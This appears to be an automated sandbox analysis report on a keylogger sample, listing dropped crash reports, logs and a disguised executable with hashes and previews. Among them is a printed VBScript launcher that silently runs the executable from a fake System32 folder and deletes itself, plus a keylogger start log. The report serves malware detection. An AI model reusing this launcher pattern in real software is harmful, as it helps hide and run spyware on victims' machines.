                                      Encrypted:false
                                      SSDEEP:192:JmruqirjmHBUZMXyaKA6K+da0/u7s8S274It0o:Jili2BUZMXyaya0/u7s8X4It0o
                                      MD5:AA848379C8899BE90BB34FFC9FD78ED6
                                      SHA1:9C3D21EAE5F7FD808FE9FF7601D3C86909D66E7A
                                      SHA-256:F0309BBB1B1EA51EB429AF3C0F9700EEAA87EB63852EDACD90447FCDA3454ADF
                                      SHA-512:E1CEA5703584131A509E1BB521550DBB43280B5FA5BF786D5330363EC97E879B2685F5ADB3EB9C15EBE85ABABB7E6BA12266C6A35203E42B2B9D6D13E048C81F
                                      Malicious:false
                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.1.4.2.6.0.6.1.2.9.4.5.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.1.4.2.6.1.6.8.3.2.5.4.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.a.5.9.4.0.0.-.a.2.6.5.-.4.b.9.6.-.9.5.e.2.-.d.0.c.9.0.2.c.4.0.2.6.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.0.a.3.f.4.5.-.5.3.b.2.-.4.9.1.c.-.b.5.9.1.-.3.0.f.1.7.d.c.0.5.e.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.x.x.o.S.e.r.v.i.c.e.s.T.r.i.a.l.N.e.t.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.A.B.M.I.G...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.8.c.-.0.0.0.1.-.0.0.1.b.-.d.c.2.a.-.a.0.8.c.a.c.3.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.8.f.e.4.d.d.b.1.2.e.2.2.3.9.6.d.b.2.4.b.9.7.7.f.f.e.c.1.5.d.5.0.0.0.0.0.9.0.4.!.0.0.0.0.5.8.a.d.f.5.d.6.0.d.9.d.a.8.2.3.a.4.f.d.6.2.2.8.
                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_PxxoServicesTria_f7f5b899daf81aa7bcebffddfe468a1dc8d73cbd_3a3bac9c_19f941f2\Report.wer
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):14876
                                      Entropy (8bit):3.768466552142861
                                      Encrypted:false
                                      SSDEEP:192:tH7op22jmHBUZMXyaPtEporj/u7s8S274It0Y:lkp2jBUZMXyabj/u7s8X4It0Y
                                      MD5:49C6549756D022B8980948B3A30AD6F1
                                      SHA1:48D04FCC1A1ED9C6819C4AA297DF462031B50D08
                                      SHA-256:CF5FDC6205BBC631F8231CFB2590F060E410A22FD2ED229D238AE077367F71A9
                                      SHA-512:35149631EC9B8E7CE497A59CE59A2C4085BA7DA919893A5687B324A2AC3EF43CBB825E4ED39FD554B08A4B060601AFFC2DBD261F9D3F386563FDF05B6B48CE74
                                      Malicious:false
                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.1.4.2.6.1.1.9.4.1.9.3.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.1.4.2.6.2.4.4.8.8.7.6.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.b.f.a.d.8.f.-.f.2.c.e.-.4.d.8.d.-.9.1.8.5.-.3.6.3.b.a.3.0.8.9.2.8.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.0.6.8.c.2.7.-.4.1.4.a.-.4.6.e.f.-.9.0.c.5.-.2.d.1.1.0.1.3.3.d.9.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.x.x.o.S.e.r.v.i.c.e.s.T.r.i.a.l.N.e.t.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.A.B.M.I.G...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.f.8.-.0.0.0.1.-.0.0.1.b.-.0.6.5.5.-.d.3.9.0.a.c.3.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.8.f.e.4.d.d.b.1.2.e.2.2.3.9.6.d.b.2.4.b.9.7.7.f.f.e.c.1.5.d.5.0.0.0.0.0.9.0.4.!.0.0.0.0.5.8.a.d.f.5.d.6.0.d.9.d.a.8.2.3.a.4.f.d.6.2.2.8.
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D34.tmp.WERInternalMetadata.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8462
                                      Entropy (8bit):3.696720556546158
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNiga6geI6YrMSUt5+rgmfZ+uSb+prH89b3UsfjS9m:RrlsNiF6G6YwSUt5+rgmfMuSX3Hfjx
                                      MD5:8E5F232C292D642681BEF46D9C6BD714
                                      SHA1:D72A4DC0063E7D00014AE4767E17C4B5332D118B
                                      SHA-256:3B474C69B3936EC4FF8FDF1858280B563A9024FA0440FA67C139D964EF0B7D14
                                      SHA-512:E29902CA5435FE3104A2E3B4B97C4D0C973F087B9A81C855C98E311F61098B11CF189DAD829DE230D229A79C4DB14C37C5B829CD1209E5CBC6FE211D78A17183
                                      Malicious:false
                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.4.8.<./.P.i.d.>.......
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2091.tmp.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4816
                                      Entropy (8bit):4.5016905343291524
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zsBJgtWI9IOWSC8BM28fm8M4JwfADNFFqq8+q8vyDNJ5ZKBzIpzWd:uITfTvvSNuJwmwxKAL5ZK5IBWd
                                      MD5:33192BD6EB24F6594613A9AC1F7491F9
                                      SHA1:E8E88CF71D49667549E41AE315F9B4092313C601
                                      SHA-256:46CFE2381A2E023AD4FFB473F6E97F97415396F377E1760E4213F070EC68D9ED
                                      SHA-512:22B4D2B5E020B1B19501A36BFDA2661A2DEAF081E4A090681073CB92F975889B25D8B8273787CDC4E51CD920A16AEB6693C4D1C1D697D206736A54018E3AB855
                                      Malicious:false
                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="967034" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER71C.tmp.WERInternalMetadata.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8418
                                      Entropy (8bit):3.693086032129617
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNibz6q6YUBT6dWgmfZ+uSb+prk89bhgsf+ULm:RrlsNi/6q6Ye6sgmfMuSOhzfS
                                      MD5:6A2BCB83451F388C15AA172C618E013D
                                      SHA1:75DA1008EF477D60CA703D65E9FB079D1C753404
                                      SHA-256:5461E4E8C092FF0509860D3E4151E162E3EE748778BEC2C193D83D6BA2900AB8
                                      SHA-512:B89C935B6F8623C3B4E131AD709315A2003768C01D8D0454690451E378384DD76065F3C37E00C401B961197D05C7A542137758031985362145BD16708E78B149
                                      Malicious:false
                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.7.2.<./.P.i.d.>.......
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B1.tmp.dmp
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Thu Apr 29 04:03:36 2021, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):271513
                                      Entropy (8bit):3.7749916865610507
                                      Encrypted:false
                                      SSDEEP:3072:r+K0loRjd+pH+5Di4TN9gIOgF5zW0h48UCgUlXPwmHveHL:rx0lfp6N9RpDqqNTj8L
                                      MD5:A5F747881D622DE744ECA00DB989BC4D
                                      SHA1:1DB5344A28CEA21E03087A6DA754AD22A65AF019
                                      SHA-256:F0B50309C00AA28A6DFA5219852C128DA926B4D53FD56CDEDF9A825AC7A735B7
                                      SHA-512:B29CC548B75CBFA424F8EADDEF34DE16F4B2E8BF8EC65EE1BF71E7424DEB5774425EBC90569E062ECB166896241D679D7C28563BF0BBD4B767A881B64B00D552
                                      Malicious:false
                                      Preview: MDMP....... ........0.`...................U...........B......$%......GenuineIntelW...........T............/.`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FD8.tmp.dmp
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Thu Apr 29 04:03:05 2021, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):272479
                                      Entropy (8bit):3.765744107890738
                                      Encrypted:false
                                      SSDEEP:3072:JP05orjd+pKHDW6hZs79gIOgF5W8o0qUCgU+/hD7i:Z05xpeu9RpDnoTTj+w
                                      MD5:B40A6E7DD073C4740AB9DD513A4E5602
                                      SHA1:721F9E4D1F9B888B62E46F17685AAE3C299A24F5
                                      SHA-256:F1699DFFA21E727188533369F78736AAE85E845B8F0146A8E164CC26C62C5709
                                      SHA-512:47CE95CF1BC3FC3E60CD26CD073D44C6712ED4CD7A6451B752656CD0375BF2673665A962143E14667D3C08E4B2B3BB1C3DDC9BA65DD02324338C6125A2C4AADE
                                      Malicious:false
                                      Preview: MDMP....... ......../.`...................U...........B.......%......GenuineIntelW...........T............/.`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA64F.tmp.WERInternalMetadata.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8522
                                      Entropy (8bit):3.713299896073488
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNie96o6YrVSUKW5jefgmfZLauSb+pr189bdgsfF/m:RrlsNiM6o6Y5SUr5jefgmfsuS9dzfw
                                      MD5:A7E9C1EBB3805F6E29B85C9E228E99E6
                                      SHA1:80F541FE176301132EC28EFF4573A81BF3F51671
                                      SHA-256:9993C66A082E99FEA3A9EBE8DBE3DD76225C908382ABCFF5E75E2A2F8294822B
                                      SHA-512:3D31CDA6067C072DEF7177B04F30F1B89337108FE0D940EA916BE6EFCC873BBB92BC53C83467C9BE3937D9ED6AEBFC09C60C4FD52DBFDDE1542948109ECDCF00
                                      Malicious:false
                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.8.0.<./.P.i.d.>.......
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA844.tmp.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4902
                                      Entropy (8bit):4.614044012002554
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zsUJgtWI9IOWSC8BV8fm8M4J/thNFF3SE+q8v4hN45ZK8mIkmYd:uITfSvvSN0J/thFK4hW5ZK8mIkmYd
                                      MD5:AD2BE70250E99BA6D2D56EE6AF169395
                                      SHA1:1938C3F4EC1E83B557D933278142DA27C4979CBA
                                      SHA-256:DC2C74718F4F7A0F2256163B88CF650EE65371A6B625A290521B5EF4918AA213
                                      SHA-512:5497AC092CCF5AB5B755389C02F27EB5D3FE3B7EE8193677F6AFB35263ADF8538A6D573844CB00A89653CE7DBE0421AC37BDF3C4EE1FBAB1601A8360266294AE
                                      Malicious:false
                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="967033" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC7.tmp.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4816
                                      Entropy (8bit):4.502173423682245
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zsBJgtWI9IOWSC8B1s8fm8M4JwfADNFFY5+q8vyDN75ZKBzIpzVNd:uITfTvvSNvRJwmAKAd5ZK5IBVNd
                                      MD5:A86E067EC54785E0426ABFC6590641F1
                                      SHA1:0D7A43797D29457A62BFF0A231A21CA952A3BC62
                                      SHA-256:4305598CA431EC308CC658B33974C7D2217663BF6E352C729ABA13B2CB9C8EC9
                                      SHA-512:5EA62DFE5E170F6852892BB67AA6C94915C516A32439790D74B58BEB566A3D83C9C40041AC765C3871791FAF0F391AE390FFC598C1B38B402A50E295603A2D4E
                                      Malicious:false
                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="967034" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF1FD.tmp.dmp
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Thu Apr 29 04:03:30 2021, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):266883
                                      Entropy (8bit):3.7946408367407027
                                      Encrypted:false
                                      SSDEEP:3072:d9FY0LToMjd+pd4HwipdF+Gl9gIOgF5v04UCgU4kucQfa+:LFY0LT4pd4Hlt9RpDvNTjGt
                                      MD5:CA75C4CC8BCD0DCF3A5E06B3A27C5372
                                      SHA1:6D055EB8EEC88CDF30ECF8CFAFF0EA674D64B63A
                                      SHA-256:5F4AA4B37EB31D51C9468DD72C18292644E4557C84B64435B4BE369BA9EF5CA6
                                      SHA-512:BD6E17224E13421EDFC80E48DD1E42A55F37CF03EFAFD95587D812130430B7A2333276536284936482C73769B2094737143021D6DA2BECFB8920C4FD630AC0D8
                                      Malicious:false
                                      Preview: MDMP....... ........0.`...................U...........B.......%......GenuineIntelW...........T............/.`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PxxoServicesTrialNet1.exe.log
                                      Process:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1039
                                      Entropy (8bit):5.365622957937216
                                      Encrypted:false
                                      SSDEEP:24:MLU84qpE4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7GE4Ks:Mgv2HKXwYHKhQnoPtHoxHhAHKzvGHKs
                                      MD5:8661DEF1A785B33817416A73C5B2C3DD
                                      SHA1:3341588F1C06BFFDDCCCF2EDE4F62D6D5F7AACA9
                                      SHA-256:BF8FD626E9B119BF1F5045CAB9B6A2A773FB44ADCCB303B807CF650CE50758DD
                                      SHA-512:035155C37E203345617D0679BC0F544E492BA0FBCC8CD42DA91FA721011BAE29095DE36F5D54CC08FF31B70DBD0FEB3DA82DDC9DD36F2D37B7EFE822DA5FBACC
                                      Malicious:true
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                      C:\Users\user\AppData\Local\Temp\install.vbs
                                      Process:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):452
                                      Entropy (8bit):3.521015513208147
                                      Encrypted:false
                                      SSDEEP:12:4D8o++ugypjBQMBvFQ4lObRKMJ2c8l/xMPuFF0M/0aimi:4Dh+S0FNObrP0/wAF0Nait
                                      MD5:CA6D4A39F5316B9A00B3EC9DF253C7B0
                                      SHA1:CDC7705860FB93E27EE3282DAC2BE575A49315C1
                                      SHA-256:819E71331AA056A50B620EB42BC55F4B39AF950962351E8A72C1F4F1A1479571
                                      SHA-512:53C34FC4C36FEA7982F1728445E3F34CFC99808932724D5FA481D5D5F881827CD6FDBFB1C31229266EEDE1A3BAED363C5F5FB3BE21646041FD5CDD5D8061DB84
                                      Malicious:false
                                      Preview: W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.S.y.s.t.e.m.3.2.\.P.x.x.o.S.e.r.v.i.c.e.s.T.r.i.a.l.N.e.t.1...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                                      C:\Users\user\AppData\Roaming\Runtime12\xlogs171.dat
                                      Process:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):74
                                      Entropy (8bit):4.689447880794982
                                      Encrypted:false
                                      SSDEEP:3:ttU1MMmKrA4RXMRPHv31aeo:tm44XqdHv3IP
                                      MD5:884D589020C0CB39128ECAC8DF3A4C1F
                                      SHA1:D582FBA993502C81733E9F2CB3195177F1B55E0C
                                      SHA-256:055AD5F7137CB6C0C5BDC94A2B37ED87B3F60FF907E22FED2B78B65EE8131EF4
                                      SHA-512:01D54938C91D0D7BCA76622BEF430DB3A2652617E017C6EE69CAB6CD5CEFAC1324F7722405C3A42C2F40EF5FF898CF2D1F4CBEBB9E43C016EA7EF2052FEFD5E9
                                      Malicious:false
                                      Preview: ..[2021/04/29 06:03:20 Offline Keylogger Started]....[ Program Manager ]..
                                      C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Process:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1912320
                                      Entropy (8bit):3.1643433187668584
                                      Encrypted:false
                                      SSDEEP:24576:DFQF36FFFFFvFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFmFFFFFFFvlFFFFFFce5:6N
                                      MD5:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      SHA1:58ADF5D60D9DA823A4FD62282C0C46134E20E47B
                                      SHA-256:EB9E13FD092522E4DDE08E96961117F9926E3EF70CA3B225F8C388E476541A21
                                      SHA-512:5D27CD110E8D62D6D3E48F20ECD09C715FE5A98E7C9CE8042559F1D6E8A6CE0D666D262A536B2376B8E2D99BEB7CE50DD53E238E2F37DF118630945B5CBB4B87
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 11%
